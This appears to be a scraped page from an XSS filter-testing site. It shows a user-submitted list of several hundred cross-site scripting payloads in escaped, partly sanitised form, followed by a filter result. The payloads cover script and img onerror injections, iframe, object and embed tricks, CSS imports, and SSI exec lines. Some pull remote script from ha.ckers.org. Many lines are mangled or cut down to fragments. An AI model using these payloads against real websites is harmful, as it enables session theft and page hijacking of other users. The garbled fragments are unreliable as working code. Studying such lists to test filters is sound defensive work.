gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x86javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE1\\\\xA0\\\\x8Ejavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x0Bjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x20javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xC2\\\\xA0javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x0Bjavascript:alert(1)\\\\x0Bsrc=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x22javascript:alert(1)\\\\x22src=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x09javascript:alert(1)\\\\x09src=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x27javascript:alert(1)\\\\x27src=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x0Ajavascript:alert(1)\\\\x0Asrc=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x0Cjavascript:alert(1)\\\\x0Csrc=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x0Djavascript:alert(1)\\\\x0Dsrc=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x60javascript:alert(1)\\\\x60src=xxx:x /&gt;\\r\\n\\\&quot;/&gt;&lt;img/onerror=\\\\x20javascript:alert(1)\\\\x20src=xxx:x /&gt;\\r\\n&lt;script\\\\x2F&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;script\\\\x20&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;script\\\\x0D&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;script\\\\x0A&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;script\\\\x0C&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;script\\\\x00&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;script\\\\x09&gt;javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=javascript:alert(1)&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=javascript:alert(\\\&#039;1\\\&#039;)&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=javascript:alert(\\\&quot;1\\\&quot;)&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=javascript:alert(`1`)&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=javascript:alert((\\\&#039;1\\\&#039;))&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=javascript:alert((\\\&quot;1\\\&quot;))&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=javascript:alert((`1`))&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=javascript:alert(A)&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=javascript:alert((A))&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=javascript:alert((\\\&#039;A\\\&#039;))&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=javascript:alert(\\\&#039;A\\\&#039;)&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=javascript:alert((\\\&quot;A\\\&quot;))&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=javascript:alert(\\\&quot;A\\\&quot;)&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=javascript:alert((`A`))&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=javascript:alert(`A`)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x onerror\\\\x0B=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x onerror\\\\x00=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x onerror\\\\x0C=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x onerror\\\\x0D=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x onerror\\\\x20=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x onerror\\\\x0A=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x onerror\\\\x09=javascript:alert(1)&gt;\\r\\n&lt;script&gt;javascript:alert(1)&lt;\\\\x00/script&gt;\\r\\n&lt;img src=# onerror\\\\x3D\\\&quot;javascript:alert(1)\\\&quot; &gt;\\r\\n&lt;input onfocus=javascript:alert(1) autofocus&gt;\\r\\n&lt;input onblur=javascript:alert(1) autofocus&gt;&lt;input autofocus&gt;\\r\\n&lt;video poster=javascript:javascript:alert(1)//\\r\\n&lt;body onscroll=javascript:alert(1)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;\\r\\n&lt;form id=test onforminput=javascript:alert(1)&gt;&lt;input&gt;&lt;/form&gt;&lt;button form=test onformchange=javascript:alert(1)&gt;X\\r\\n&lt;video&gt;&lt;source onerror=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;video onerror=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;source&gt;\\r\\n&lt;form&gt;&lt;button formaction=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;X\\r\\n&lt;body oninput=javascript:alert(1)&gt;&lt;input autofocus&gt;\\r\\n&lt;math href=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;CLICKME&lt;/math&gt; &lt;math&gt; &lt;maction actiontype=\\\&quot;statusline#http://google.com\\\&quot; xlink:href=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;CLICKME&lt;/maction&gt; &lt;/math&gt;\\r\\n&lt;frameset onload=javascript:alert(1)&gt;\\r\\n&lt;table background=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;!--&lt;img src=\\\&quot;--&gt;&lt;img src=x onerror=javascript:alert(1)//\\\&quot;&gt;\\r\\n&lt;comment&gt;&lt;img src=\\\&quot;&lt;/comment&gt;&lt;img src=x onerror=javascript:alert(1))//\\\&quot;&gt;\\r\\n&lt;![&gt;&lt;img src=\\\&quot;]&gt;&lt;img src=x onerror=javascript:alert(1)//\\\&quot;&gt;\\r\\n&lt;style&gt;&lt;img src=\\\&quot;&lt;/style&gt;&lt;img src=x onerror=javascript:alert(1)//\\\&quot;&gt;\\r\\n&lt;li style=list-style:url() onerror=javascript:alert(1)&gt; &lt;div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)&gt;&lt;/div&gt;\\r\\n&lt;head&gt;&lt;base href=\\\&quot;javascript://\\\&quot;&gt;&lt;/head&gt;&lt;body&gt;&lt;a href=\\\&quot;/. /,javascript:alert(1)//#\\\&quot;&gt;XXX&lt;/a&gt;&lt;/body&gt;\\r\\n&lt;SCRIPT FOR=document EVENT=onreadystatechange&gt;javascript:alert(1)&lt;/SCRIPT&gt;\\r\\n&lt;OBJECT CLASSID=\\\&quot;clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\\\&quot;&gt;&lt;PARAM NAME=\\\&quot;DataURL\\\&quot; VALUE=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/OBJECT&gt;\\r\\n&lt;object data=\\\&quot;data:text/html;base64,%(base64)s\\\&quot;&gt;\\r\\n&lt;embed src=\\\&quot;data:text/html;base64,%(base64)s\\\&quot;&gt;</code> <p>keyword(s): z</p> <p>description: <TABLE BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<TABLE><TD BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<DIV url((\\\'XSS\\\'))\\\">\\r\\n<DIV >\\r\\n<DIV url(&#1;(\\\'XSS\\\'))\\\">\\r\\n<DIV alert&#40;\\\'XSS\\\'&#41;);\\\">\\r\\n&lt;!--[if gte IE 4]>alert&#40;\\\'XSS\\\'&#41;;<![endif]--&gt;\\r\\n&lt;BASE HREF=\\\"(\\\'XSS\\\');//\\\"&gt;\\r\\n&lt;OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://ha.ckers.org/scriptlet.html\\\"&gt;&lt;/OBJECT&gt;\\r\\n&lt;!--#exec cmd=\\\"/bin/echo \\\'<SCR\\\'\\\"--&gt;&lt;!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://ha.ckers.org/xss.js>\\\'\\\"--&gt;\\r\\n&lt;? echo(\\\'<SCR)\\\';echo(\\\'IPT>alert&#40;\\\"XSS\\\"&#41;\\\'); ?&gt;\\r\\n<IMG >\\>\\>\\>\\>\\>\\r\\n\\\'>\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n(\\\"<SCRI\\\");PT SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<A >XSS</A>\\r\\n0\\\\\\\"autofocus/=alert&#40;1&#41;-->&lt;video/&gt;\\\"-confirm&#40;3&#41;-\\\"\\r\\nveris-->group&lt;svg/=alert&#40;/XSS/&#41;//\\r\\n#\\\"&gt;<img >\\ >\\>[\\\" =\\\">\\>\\r\\nfor((i)in(self))eval&#40;i&#41;(1)\\r\\n\\r\\n\\r\\n<a >test</a>\\r\\n\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\ >\\/>\\r\\n\\\"><h1>&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\\">123</h1>\\r\\n\\\"><h1>&lt;IFRAME SRC=# =\\\"alert&#40;&#41;\\\"&gt;&lt;/IFRAME&gt;123</h1>\\r\\n&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;IFRAME SRC=# =\\\"alert&#40;&#41;\\\"&gt;&lt;/IFRAME&gt;\\r\\n\\\"><h1>&lt;IFRAME SRC=# =\\\"alert&#40;&#41;\\\"&gt;&lt;/IFRAME&gt;123</h1>\\r\\n\\\">&lt;/iframe&gt;alert&#40;`TEXT YOU WANT TO BE DISPLAYED`&#41;;&lt;iframe frameborder=\\\"0\\r\\n\\\"&gt;<h1>&lt;IFRAME width=\\\"420\\\" height=\\\"315\\\" SRC=\\\"http://www.youtube.com/embed/sxvccpasgTE\\\" frameborder=\\\"0\\\" =\\\"alert&#40;&#41;\\\"&gt;&lt;/IFRAME&gt;123</h1>\\r\\n\\\"><h1>&lt;iframe width=\\\"420\\\" height=\\\"315\\\" src=\\\"http://www.youtube.com/embed/sxvccpasgTE\\\" frameborder=\\\"0\\\" allowfullscreen&gt;&lt;/iframe&gt;123</h1>\\r\\n><h1>&lt;IFRAME width=\\\"420\\\" height=\\\"315\\\" frameborder=\\\"0\\\" =\\\".href=\\\'https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr\\r\\ng\\\'\\\"&gt;&lt;/IFRAME&gt;Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250\\r\\n&lt;IFRAME width=\\\"420\\\" height=\\\"315\\\" frameborder=\\\"0\\\" =\\\"alert&#40;&#41;\\\"&gt;&lt;/IFRAME&gt;\\r\\n\\\"><h1>&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\\">123</h1>\\r\\n\\\"><h1>&lt;IFRAME SRC=# =\\\"alert&#40;&#41;\\\"&gt;&lt;/IFRAME&gt;123</h1>\\r\\n&lt;iframe src=http://xss.rocks/scriptlet.html &lt;\\r\\n&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;IFRAME SRC=# =\\\"alert&#40;&#41;\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;iframe src=\\\" (1) \\\"&gt;\\r\\n&lt;svg&gt;&lt;style&gt;{font-family:\\\'&lt;iframe/=confirm&#40;1&#41;&gt;\\\'\\r\\n&lt;input/=\\\"(1)\\\"\\r\\n&lt;sVg&gt;&lt;isindex &gt;\\&gt;\\&gt;X&lt;/a\\r\\nhttp://www.googlealert)\r\\n&lt;a &gt;XYZ&lt;/a\\r\\n&lt;img/&gt;alert&#40;String.fromCharCode(49&#41;)^__^\\r\\n&lt;/style &gt;&lt;input type=\\\"date\\\" =\\\"alert&#40;1&#41;\\\"&gt;\\r\\n&lt;form&gt;&lt;textarea &#13; =\\\'\\\a\\\l\\\e\\\r\\\t(1)\\\'&gt;\\r\\n\\\'&gt;\\r\\n&lt;a &gt;X&lt;/a&gt;\\r\\n\\r\\n&lt;style/=&lt;!-- &gt; alert &#40;1&#41;&gt;\\r\\n&lt;///style///&gt;&lt;span / =\\\'alert&#40;1&#41;\\\'&gt;SPAN\\r\\n&lt;img/&gt;&lt;svg&gt;&lt;style&gt;{-o-link-source:\\\'&lt;body/=confirm&#40;1&#41;&gt;\\\'\\r\\n&#13;&lt;blink/&#13; =prompt&#40;1&#41;&gt;OnMouseOver {Firefox & Opera}\\r\\n&lt;marquee =\\\'(1)\\\'&gt;^__^\\r\\n&lt;div/&gt;X&lt;/div&gt; {IE7}\\r\\n&lt;iframe// src=(1)\\r\\n//&lt;form/action=()&gt;&lt;input/type=\\\'submit\\\'&gt;//\\r\\n/*iframe/src*/&lt;iframe/src=\\\"&lt;iframe/src=@\\\"/=prompt&#40;1&#41; /*iframe/src*/&gt;\\r\\n//|\\\\\\\\ //|\\\\\\\\ //|\\\\\\\\\\r\\n&lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src:\\\'&lt;style/=this.=confirm&#40;1&#41;&gt;\\\'&lt;/font&gt;/&lt;/style&gt;\\r\\n&lt;a/&gt;&lt;input type=\\\"X\\\"&gt;\\r\\n&lt;/plaintext\\\\&gt;&lt;/|\\\\&gt;&lt;plaintext/=prompt&#40;1&#41;\\r\\n&lt;/svg&gt;\\\'\\\'&lt;svg&gt;alert&#40;1&#41; {Opera}\\r\\n&lt;a &gt;&lt;button&gt;\\r\\n&lt;div =\\\'alert&#40;1&#41;\\\'&gt;DIV&lt;/div&gt;\\r\\n&lt;iframe =\\\"prompt&#40;1&#41;\\\"&gt;\\r\\n&lt;a &gt;X&lt;/a&gt;\\r\\n&lt;embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n&lt;object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n&lt;var =\\\"prompt&#40;1&#41;\\\"&gt;On Mouse Over&lt;/var&gt;\\r\\n&lt;a &gt;Click Here&lt;/a&gt;\\r\\n&lt;img &gt;\\r\\n&lt;%&lt;!--\\\'%&gt;alert&#40;1&#41;;--&gt;\\r\\n\\\"&gt;X&lt;/a\\r\\n&lt;iframe/=\\\a\\\l\\\e\\\r\\\t(\\\'\\\a\\\') worksinIE&gt;\\r\\n~\\\'\\\a\\\' ; \\\t\\\h\\\r\\\o\\\w ~ \\\t\\\h\\\i\\\s. \\\a\\\l\\\e\\\r\\\t(~\\\'\\\a\\\')U+\\r\\n&lt;/object&gt;\\r\\n&lt;iframe src=\\\%(base64)s\\\"&gt;\\r\\n&lt;embed src=\\\%(base64)s\\\"&gt;</p> <p>by zz | at 2021-08-19 09:45:17</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">\\\'\\\';!--\\\"<XSS>=&{()}\\r\\n\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<a >xxs link</a>\\r\\n<a >xxs link</a>\\r\\n<IMG \\\"\\\"\\\">\\\">\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\nperl -e \\\'print \\\"<IMG >\\\";\\\' > out\\r\\n<IMG >\\r\\n\\r\\n&lt;BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert&#40;\\\"XSS\\\"&#41;&gt;\\r\\n\\r\\n&lt;\\r\\n\\r\\n\\r\\n&lt;IMG &gt;\\&gt;\\&gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\"(\\\'XSS\\\')\\\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;BODY &gt;\\r\\n&lt;BGSOUND SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;BR SIZE=\\\"&{alert&#40;\\\'XSS\\\'&#41;}\\\"&gt;\\r\\n&lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"http://ha.ckers.org/xss.css\\\"&gt;\\r\\n&lt;STYLE&gt;@import\\\'http://ha.ckers.org/xss.css\\\';&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=\\\"Link\\\" Content=\\\"&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet\\\"&gt;\\r\\n&lt;STYLE&gt;BODY{:url(\\\"http://ha.ckers.org/xssmoz.xml#xss\\\")}&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert&#40;\\\"XSS\\\"&#41;\\\';&lt;/STYLE&gt;\\r\\n&lt;IMG &gt;\\r\\nexp/*&lt;A &gt;\\r\\n&lt;STYLE TYPE=\\\"text/javascript\\\"&gt;alert&#40;\\\'XSS\\\'&#41;;&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;.XSS{background-image:url(\\\"(\\\'XSS\\\')\\\");}&lt;/STYLE&gt;&lt;A &gt;&lt;/A&gt;\\r\\n&lt;STYLE type=\\\"text/css\\\"&gt;BODY{background:url(\\\"(\\\'XSS\\\')\\\")}&lt;/STYLE&gt;\\r\\n&lt;STYLE type=\\\"text/css\\\"&gt;BODY{background:url(\\\"(\\\'XSS\\\')\\\")}&lt;/STYLE&gt;\\r\\n&lt;XSS &gt;\\r\\n&lt;XSS &gt;\\r\\n\\r\\n&lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\"&gt;\\r\\n&lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;IFRAME SRC=# &gt;&lt;/IFRAME&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/FRAMESET&gt;\\r\\n&lt;TABLE BACKGROUND=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;DIV url((\\\'XSS\\\'))\\\"&gt;\\r\\n&lt;DIV &gt;\\r\\n&lt;DIV url(&#1;(\\\'XSS\\\'))\\\"&gt;\\r\\n&lt;DIV alert&#40;\\\'XSS\\\'&#41;);\\\"&gt;\\r\\n&lt;BASE HREF=\\\"(\\\'XSS\\\');//\\\"&gt;\\r\\n &lt;OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://ha.ckers.org/scriptlet.html\\\"&gt;&lt;/OBJECT&gt;\\r\\n&lt;EMBED SRC=\\\PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"&gt;&lt;/EMBED&gt;\\r\\n\\r\\n&lt;!--#exec cmd=\\\"/bin/echo \\\'&lt;SCR\\\'\\\"--&gt;&lt;!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://ha.ckers.org/xss.js&gt;\\\'\\\"--&gt;\\r\\n&lt;? echo(\\\'&lt;SCR)\\\';echo(\\\'IPT&gt;alert&#40;\\\"XSS\\\"&#41;\\\'); ?&gt;\\r\\n&lt;IMG &gt;\\&gt;\\r\\n &lt;HEAD&gt;&lt;META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"&gt; &lt;/HEAD&gt;\\r\\n\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n\\r\\n\\\" \\\'\\\' SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n\\\'\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n` SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n\\\'&gt;\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\nPT SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;A &gt;XSS&lt;/A&gt;\\r\\n&lt;A &gt;XSS&lt;/A&gt;\\r\\n&lt;A &gt;XSS&lt;/A&gt;\\r\\n&lt;A &gt;XSS&lt;/A&gt;\\r\\n&lt;A &gt;XSS&lt;/A&gt;\\r\\n&lt;A &gt;XSS&lt;/A&gt;\\r\\n&lt;iframe src=\\\" (1) \\\"&gt;\\r\\n&lt;svg&gt;&lt;style&gt;{font-family:\\\'&lt;iframe/&gt;\\\'\\r\\n&lt;input/&gt;&lt;isindex &gt;\\&gt;\\&gt;\\\"&gt;\\/&gt;\\r\\n&lt;svg&gt;\r\\n&lt;svg&gt;\\r\\n&lt;iframe src=)&gt;\\r\\n&lt;form&gt;&lt;a &gt;X\\r\\n&lt;img/*/&gt;\\r\\n&lt;img/ &#11; &gt;\\r\\n&lt;form&gt;&lt;iframe &#11; src=\\\"(1)\\\"&#11; ;&gt;\\r\\n&lt;a &gt;X&lt;/a\\r\\nhttp://www.googlealert)\r\\n&lt;a &gt;XYZ&lt;/a\\r\\n&lt;img/&gt;alert&#40;String.fromCharCode(49&#41;)^__^\\r\\n&lt;/style &gt;&lt;input type=\\\"date\\\" &gt;\\r\\n&lt;form&gt;&lt;textarea &#13; &gt;\\r\\n\\r\\n&lt;a &gt;X&lt;/a&gt;\\r\\n\\r\\n&lt;style/ &gt; alert &#40;1&#41;&gt;\\r\\n&lt;///style///&gt;&lt;span / &gt;SPAN\\r\\n&lt;img/&gt;&lt;svg&gt;&lt;style&gt;{-o-link-source:\\\'&lt;body/&gt;\\\'\\r\\n&#13;&lt;blink/&#13; &gt; {Firefox & Opera}\\r\\n&lt;marquee &gt;^__^\\r\\n&lt;div/&gt;X&lt;/div&gt; {IE7}\\r\\n&lt;iframe// src=(1)\\r\\n//&lt;form/action=()&gt;&lt;input/type=\\\'submit\\\'&gt;//\\r\\n/*iframe/src*/&lt;iframe/src=\\\"&lt;iframe/src=@\\\"/ /*iframe/src*/&gt;\\r\\n//|\\\\\\\\ //|\\\\\\\\ //|\\\\\\\\\\r\\n&lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src:\\\'&lt;style/&gt;\\\'&lt;/font&gt;/&lt;/style&gt;\\r\\n&lt;a/&gt;&lt;input type=\\\"X\\\"&gt;\\r\\n&lt;/plaintext\\\\&gt;&lt;/|\\\\&gt;&lt;plaintext/&gt;\\\'\\\'&lt;svg&gt;alert&#40;1&#41; {Opera}\\r\\n&lt;a &gt;&lt;button&gt;\\r\\n&lt;div &gt;DIV&lt;/div&gt;\\r\\n&lt;iframe &gt;\\r\\n&lt;a &gt;X&lt;/a&gt;\\r\\n&lt;embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n&lt;object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n&lt;var &gt;On Mouse Over&lt;/var&gt;\\r\\n&lt;a &gt;Click Here&lt;/a&gt;\\r\\n&lt;img &gt;\\r\\n&lt;%&lt;!--\\\'%&gt;\\r\\n\\r\\n&lt;iframe/src \\\\/\\\\/ value=&lt;&gt;&lt;iframe/src=(1)\\r\\n&lt;input type=\\\"text\\\" value=`` &lt;div/&gt;X&lt;/div&gt;\\r\\nhttp://www.&lt;/iframe&gt;\\r\\n&lt;svg&gt;&lt;/iframe&gt;\\r\\n&lt;img &gt;\\&gt;&lt;/object&gt;\\r\\n&lt;meta http-equiv=\\\"refresh\\\" content=\\\"0;(1)\\\"/&gt;\\r\\n&lt;math&gt;&lt;a &gt;click\\r\\n&lt;embed code=\\\"http://businessinfo.co.uk/labs/xss/xss.swf\\\" allowscriptaccess=always&gt;\\r\\n&lt;svg contentScriptType=text/vbs&gt;\\\"&gt;X&lt;/a\\r\\n&lt;iframe/ worksinIE&gt;\\r\\na=\\\a & /=/\\r\\n\r\\n&lt;object data=\\\alert&#40;1&#41;&gt;\\r\\n\\r\\n&lt;body/ alert&#40;1&#41;&gt;\\r\\n/*\\r\\n&lt;svg&gt; alert&#40;1&#41;\\r\\n&lt;a &gt;ClickMe\\r\\n alert&#40;1&#41; 1=2\\r\\n&lt;div/&gt; style=\\\"x:\\\"&gt;\\r\\n&lt;--`&lt;img/&gt; --!&gt;\\&gt;x&lt;/button&gt;\\r\\n\\\"&gt;&lt;img &gt;\\r\\n&lt;form&gt;&lt;button &gt;CLICKME\\r\\n&lt;math&gt;&lt;a &gt;click\\r\\n&lt;object data=PHN2Zy9vbmxvYWQ9YWxlcnQoMik+&gt;&lt;/object&gt;\\r\\n&lt;iframe src=\\\PHN2Zy9vbmxvYWQ9YWxlcnQoMik+&gt;&lt;/object&gt;\\r\\n&lt;iframe 